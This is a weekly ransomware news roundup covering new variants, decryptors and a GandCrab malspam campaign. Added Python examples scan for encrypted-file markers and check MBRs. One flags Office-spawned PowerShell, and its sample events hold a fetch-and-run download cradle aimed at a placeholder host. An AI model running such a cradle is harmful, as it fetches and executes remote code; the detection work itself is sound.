Lots of small variants were released this week, and surprisingly most are actually active and being distributed. The big stories are new distribution methods for GandCrab, decryptors for Cryakl variants and MoneroPay, and a new ransomware called Black Ruby.

Contributors and those who provided new ransomware information and stories this week include: @struppigel, @malwrhunterteam, @FourOctets, @jorntvdw, @DanielGallagher, @BleepinComputer, @campuscodi, @Seifreed, @demonslay335, @PolarToffee, @malwareforme, @LawrenceAbrams, @fwosar, @hexwaxwing, @GrujaRS, @bartblaze, @Alex_Ad, @JakubKroustek, @benkow_, @sacbee_news, @SophosLabs, and @secbydefault.

February 3rd 2018

CouchDB instances still being hit with some sort of ransomware

Benkow moʞuƎq found exposed CouchDB instances that are being hit by some sort of ransomware or other attacker.

RaruCrypt Ransomware discovered

Jakub Kroustek discovered the RaruCrypt Ransomware, by Альберт Михайлович. Encrypted files can be decrypted with RAR; the password for the RAR file is "S?{DCO^C!{L@CR^+<7E}2".

February 5th 2018

New Hermes 2.1 changes

MalwareHunterTeam found a new sample of the Hermes 2.1 Ransomware. Michael Gillespie said it now uses a new file marker at the end of each encrypted file, along with an encrypted AES-256 key blob per file.
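
A trailing file marker is what lets an analyst attribute an encrypted file to a family without a ransom note, and the per-file key blob next to it is worth carving out, because those keys can only ever be recovered if the wrapping private key is released. The script below is an added example of that triage step, not code from the article or from any decryptor: the marker bytes, the footer layout (ciphertext, then blob, then marker) and the 256-byte blob length are assumptions chosen for the example, not the values from the Hermes 2.1 sample.

```python
import os
import tempfile

# Assumed footer layout for this example: [ciphertext][key blob][marker].
# MARKER and KEY_BLOB_LEN are placeholders, not values from the Hermes sample;
# 256 bytes is simply the size of a 2048-bit RSA-wrapped key.
MARKER = b"EXAMPLE-MARKER"
KEY_BLOB_LEN = 256


def parse_footer(data, marker=MARKER, blob_len=KEY_BLOB_LEN):
    """Return (ciphertext, key_blob) if data ends with the marker, else None."""
    if len(data) < len(marker) + blob_len or not data.endswith(marker):
        return None
    body = data[:len(data) - len(marker)]
    return body[:len(body) - blob_len], body[len(body) - blob_len:]


def read_tail(path, n):
    """Read only the last n bytes of a file so large files are not fully loaded."""
    with open(path, "rb") as fh:
        fh.seek(0, os.SEEK_END)
        size = fh.tell()
        if size < n:
            return b""
        fh.seek(size - n)
        return fh.read(n)


def scan_tree(root, marker=MARKER, blob_len=KEY_BLOB_LEN):
    """Map path -> key blob for every file under root that carries the marker."""
    hits = {}
    footer_len = len(marker) + blob_len
    for dirpath, _, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            try:
                tail = read_tail(path, footer_len)
            except OSError:
                continue  # unreadable file; skip rather than abort the sweep
            parsed = parse_footer(tail, marker, blob_len)
            if parsed is not None:
                hits[path] = parsed[1]
    return hits


def demo():
    """Constructed sample: one marked file and one plain file in a temp dir."""
    root = tempfile.mkdtemp()
    blob = os.urandom(KEY_BLOB_LEN)
    with open(os.path.join(root, "report.docx.enc"), "wb") as fh:  # hypothetical name
        fh.write(os.urandom(4096) + blob + MARKER)
    with open(os.path.join(root, "notes.txt"), "wb") as fh:
        fh.write(b"plain text, no footer")
    hits = scan_tree(root)
    # Report whether the blob carved from each hit matches the one we embedded.
    return {os.path.basename(p): carved == blob for p, carved in hits.items()}


if __name__ == "__main__":
    print(demo())
```

Once a marker is confirmed from a real sample, swap in the actual bytes and blob length; scanning only the tail keeps the sweep cheap even across large file shares.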

Decryptor for MoneroPay Ransomware

Alexander Adamov of NioGuard Security Labs created a decryptor for the MoneroPay ransomware.

New Jigsaw Ransomware variant discovered

Michael Gillespie found a new Jigsaw Ransomware variant that appends the .# extension to encrypted files. Michael's decryptor has been updated to handle this variant.

New Crypt12 Ransomware released

Michael Gillespie found a new variant of the Crypt12 Ransomware that uses the hernansec@protonmail.ch email address. Michael has updated his decryptor.

February 6th 2018

Ransomware Victims Hit on Average by Two Attacks per Year

A study by Sophos of 2,700 IT professionals across the globe revealed that 54% of organizations suffered a ransomware attack in the last year, and most of those organizations were hit more than once, with an average of two ransomware attacks per victim.

Researcher Bypasses Windows Controlled Folder Access Anti-Ransomware Protection

A security researcher has found a way to bypass the "Controlled Folder Access" feature added in Windows 10 in October 2017, which Microsoft has touted as a reliable anti-ransomware defensive measure.

New Jigsaw Ransomware variant discovered

Michael Gillespie found a new Turkish Jigsaw Ransomware variant that appends the .justice extension to encrypted files. Michael's decryptor has been updated to handle this variant.

New AdamLocker variant

Security researcher Bart discovered a new AdamLocker variant written in Korean. This variant appends the .adam extension to encrypted files.

February 8th 2018

GandCrab Ransomware Being Distributed Via Malspam Disguised as Receipts

A new malspam campaign is underway that is pretending to be PDF receipts, but instead installs the GandCrab ransomware on a victim's computer. This is done through a series of malicious documents that ultimately install the ransomware via a PowerShell script.
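
The chain described above, a document opened from the malspam spawning PowerShell to fetch and run the payload, is the part a defender can see in process telemetry regardless of which ransomware lands at the end. The following is an added example of that detection logic, not code from the article or from any vendor: it reads newline-delimited JSON events using Sysmon Event ID 1 field names (Image, ParentImage, CommandLine), flags script hosts spawned by Office or Reader processes, and scores the command line, decoding any -EncodedCommand payload so download cradles hidden in base64 still match. The four events are constructed for the example, not real telemetry, and the thresholds are assumptions.

```python
import base64
import json
import re

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "acrord32.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# (pattern, label) pairs scored against the command line plus any decoded payload.
INDICATORS = [
    (re.compile(r"-(?:e|enc|encodedcommand)\b", re.I), "encoded command"),
    (re.compile(r"-(?:w|windowstyle)\s+hidden", re.I), "hidden window"),
    (re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|\bcurl\b", re.I), "download cradle"),
    (re.compile(r"-(?:nop|noprofile)\b", re.I), "no profile"),
    (re.compile(r"\bbypass\b", re.I), "execution policy bypass"),
]
ENCODED_ARG = re.compile(r"-(?:e|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline):
    """Decode a PowerShell -EncodedCommand argument (base64 of UTF-16LE), or return ''."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le", errors="replace")
    except ValueError:
        return ""


def evaluate(event):
    """Return an alert dict for an Office/Reader -> script host spawn, else None."""
    parent = basename(event.get("ParentImage", ""))
    child = basename(event.get("Image", ""))
    if parent not in OFFICE_PARENTS or child not in SCRIPT_HOSTS:
        return None
    cmdline = event.get("CommandLine", "")
    text = cmdline + " " + decode_encoded_command(cmdline)
    reasons = [label for rx, label in INDICATORS if rx.search(text)]
    # Assumed scoring: the parent/child pair alone is worth 50, each indicator adds 15.
    return {"pid": event.get("ProcessId"), "parent": parent, "child": child,
            "score": min(100, 50 + 15 * len(reasons)), "reasons": reasons}


def detect(log_text):
    """Run evaluate() over newline-delimited JSON events and collect the alerts."""
    alerts = []
    for line in log_text.splitlines():
        if line.strip():
            alert = evaluate(json.loads(line))
            if alert:
                alerts.append(alert)
    return alerts


def _ps_encode(script):
    """Encode a script the way PowerShell expects for -EncodedCommand."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


# Constructed sample events (not real telemetry); the URL is a placeholder.
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/r.ps1')"
WINWORD = r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
POWERSHELL = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_LOG = "\n".join(json.dumps(e) for e in [
    {"ProcessId": 1200, "ParentImage": r"C:\Windows\explorer.exe", "Image": WINWORD,
     "CommandLine": '"WINWORD.EXE" /n "C:\\Users\\victim\\Downloads\\receipt.doc"'},
    {"ProcessId": 1344, "ParentImage": WINWORD, "Image": POWERSHELL,
     "CommandLine": "powershell.exe -NoP -W Hidden -Enc " + _ps_encode(CRADLE)},
    {"ProcessId": 1402, "ParentImage": WINWORD, "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c powershell -ExecutionPolicy Bypass -NoProfile -File C:\Users\Public\receipt.ps1"},
    {"ProcessId": 1500, "ParentImage": r"C:\Windows\explorer.exe", "Image": POWERSHELL,
     "CommandLine": "powershell.exe -NoProfile"},
])

if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(alert)
```

The plain user-launched PowerShell (pid 1500) and Word itself (pid 1200) produce nothing; the two Word-spawned script hosts do, and the encoded one scores highest because the cradle is only visible after decoding.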

Honor Ransomware discovered

GrujaRS found a new My Little Ransomware variant called Honor Ransomware. This ransomware will append the extension .honor to encrypted files and scramble the file name, but does not drop a ransom note.

California Voter Database Exposed Online (Again), Held for Ransom (Again)

For the second time in two months, the voter registration information of over 19 million Californians was leaked online via an unsecured MongoDB database, which was later held for ransom by hackers.

February 9th 2018

Black Ruby Ransomware Skips Victims in Iran and Adds a Miner for Good Measure

A new ransomware was discovered this week by MalwareHunterTeam called Black Ruby. This ransomware will encrypt the files on a computer, scramble the file names, and then append the .BlackRuby extension. To make matters worse, Black Ruby also installs a Monero miner that uses as much of the CPU as it can.

DexCrypt MBRLocker Demands 30 Yuan To Gain Access to Computer

A new Chinese MBRLocker called DexCrypt has been discovered that demands 30 Yuan to regain access to a computer. First discovered by security researcher JAMESWT, this ransomware modifies the master boot record of the victim's computer so that it shows a ransom note before Windows starts.
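
Because an MBRLocker only has to overwrite the 446 bytes of bootstrap code in the first sector, comparing that region against a known-good hash is enough to spot it, and the partition table it usually leaves intact is what lets data be recovered from the disk afterwards. The script below is an added example of that check, not DexCrypt's code and not from the article: it parses the 512-byte sector, hashes the bootstrap region, validates the 0x55AA signature and walks the four partition entries. The "clean" and "locked" sectors are constructed stand-ins, and the note text is invented for the example.

```python
import hashlib
import struct

SECTOR_SIZE = 512
BOOTSTRAP_LEN = 446   # bytes 0-445 boot code, 446-509 partition table, 510-511 signature
BOOT_SIGNATURE = b"\x55\xaa"


def parse_mbr(sector: bytes) -> dict:
    """Split a 512-byte MBR into a bootstrap hash, signature check and partition entries."""
    if len(sector) != SECTOR_SIZE:
        raise ValueError("MBR must be exactly 512 bytes")
    bootstrap = sector[:BOOTSTRAP_LEN]
    partitions = []
    for i in range(4):
        entry = sector[BOOTSTRAP_LEN + 16 * i:BOOTSTRAP_LEN + 16 * (i + 1)]
        # status, CHS start, type, CHS end, LBA start, sector count
        status, _chs_start, ptype, _chs_end, lba_start, count = struct.unpack("<B3sB3sII", entry)
        if ptype != 0:  # type 0 is an empty slot
            partitions.append({"index": i, "bootable": status == 0x80, "type": ptype,
                               "lba_start": lba_start, "sectors": count})
    return {
        "bootstrap_sha256": hashlib.sha256(bootstrap).hexdigest(),
        "signature_ok": sector[510:512] == BOOT_SIGNATURE,
        "partitions": partitions,
    }


def check_mbr(sector: bytes, baseline_sha256: str) -> list:
    """Compare a captured MBR against a known-good bootstrap hash; return findings."""
    info = parse_mbr(sector)
    findings = []
    if not info["signature_ok"]:
        findings.append("boot signature 0x55AA missing")
    if info["bootstrap_sha256"] != baseline_sha256:
        findings.append("bootstrap code differs from baseline")
    if not any(p["bootable"] for p in info["partitions"]):
        findings.append("no active partition")
    return findings


def read_mbr(device_path: str) -> bytes:
    """Read the first sector of a raw device (needs admin/root; not used by demo())."""
    with open(device_path, "rb") as fh:
        return fh.read(SECTOR_SIZE)


def build_sample_mbr(bootstrap: bytes) -> bytes:
    """Construct a sample MBR with one active NTFS (type 0x07) partition at LBA 2048."""
    bootstrap = bootstrap.ljust(BOOTSTRAP_LEN, b"\x00")[:BOOTSTRAP_LEN]
    entry = struct.pack("<B3sB3sII", 0x80, b"\x00\x00\x00", 0x07, b"\x00\x00\x00", 2048, 0x100000)
    return bootstrap + entry + b"\x00" * 48 + BOOT_SIGNATURE


# Constructed stand-ins: a few bytes of an ordinary x86 bootstrap prologue, and a
# replacement that just carries note text. Neither is DexCrypt's real boot code.
CLEAN_BOOTSTRAP = b"\x33\xc0\x8e\xd0\xbc\x00\x7c\xfb"
LOCKED_BOOTSTRAP = b"\xeb\x20" + b"Your disk is locked. Pay 30 Yuan to unlock."


def demo() -> dict:
    """Baseline the clean sector, then check the note-carrying one against it."""
    clean = build_sample_mbr(CLEAN_BOOTSTRAP)
    baseline = parse_mbr(clean)["bootstrap_sha256"]
    return {"clean": check_mbr(clean, baseline),
            "locked": check_mbr(build_sample_mbr(LOCKED_BOOTSTRAP), baseline)}


if __name__ == "__main__":
    print(demo())
```

On a live system the sector comes from read_mbr(r"\\.\PhysicalDrive0") on Windows or read_mbr("/dev/sda") on Linux, and the baseline hash should be recorded while the machine is known clean; a bootstrap mismatch with an intact partition table is the signature of a locker rather than a wiper.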

dcrtr Ransomware Found

Michael Gillespie was looking for a ransomware that appends the .[decryptor@cock.li].dcrtr extension and drops a ransom note named ReadMe_Decryptor.txt. The sample was then found by both Jakub Kroustek and MalwareHunterTeam.

New RotorCrypt variant

Michael Gillespie found a new RotorCrypt variant that appends the !decrfile@tutanota.com.crypo extension.


That's it for this week! Hope everyone has a nice weekend!

